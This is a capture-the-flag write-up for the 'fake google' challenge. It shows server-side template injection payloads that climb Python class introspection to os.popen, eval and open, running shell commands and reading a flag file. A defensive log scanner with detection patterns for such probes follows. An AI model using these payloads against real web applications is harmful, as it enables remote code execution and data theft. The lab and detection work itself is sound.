[BJDCTF 2nd]fake google
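Write-up from Kuller_Yan
First, open the target machine:
Test whether an SSTI injection exists: {{1+1}}
Run a query: {{''.__class__}}
Next: {{''.__class__.__bases__}}
Next: {{''.__class__.__bases__[0].__subclasses__()}}
Find entry number 169: {{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}
Reading write-ups by more experienced players, there are other approaches as well; I am reproducing them here:
Alternatively, locate os._wrap_close, number 117: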
{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('dir').read()}}
This lists the current folder.
{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()}}
This opens the file. There are many payloads; explore them slowly and build up a collection over time = =
{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}
From https://buuoj.cn/challenges#[BJDCTF%202nd]fake%20google
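For the defending side, the probes above leave a recognizable trace in request logs. The following is an added example, not part of the original write-up: a small log scanner that percent-decodes query parameters and flags the `{{1+1}}`-style arithmetic test and the introspection chains shown above. The log format, the `/search` path and the `name` parameter are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Attribute names used in the introspection chains in the write-up above.
INTROSPECTION = ("__class__", "__bases__", "__mro__", "__subclasses__",
                 "__globals__", "__builtins__")
EXPR = re.compile(r"\{\{(.*?)\}\}", re.S)          # template expression body
ARITH = re.compile(r"^\s*\d+\s*[-+*]\s*\d+\s*$")   # arithmetic test such as 1+1
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is still inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return 'introspection', 'probe' or None for one parameter value."""
    verdict = None
    for expr in EXPR.findall(fully_decode(value)):
        if sum(name in expr for name in INTROSPECTION) >= 2:
            return "introspection"
        if ARITH.match(expr):
            verdict = "probe"
    return verdict

def scan(lines):
    """Return (line_number, parameter, verdict) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            verdict = classify(value)
            if verdict:
                findings.append((number, key, verdict))
    return findings

SAMPLE_LOG = [  # constructed access-log lines, not taken from the challenge
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search?name=%7B%7B1%2B1%7D%7D HTTP/1.1" 200 498',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search?name=%7B%7B%27%27.__class__.__bases__%7D%7D HTTP/1.1" 200 530',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /search?name=%257B%257B%2528%2529.__class__.__mro__%257D%257D HTTP/1.1" 200 530',
]
```

Matching on these attribute names is a triage heuristic for logs; it does not replace keeping user input out of the template source.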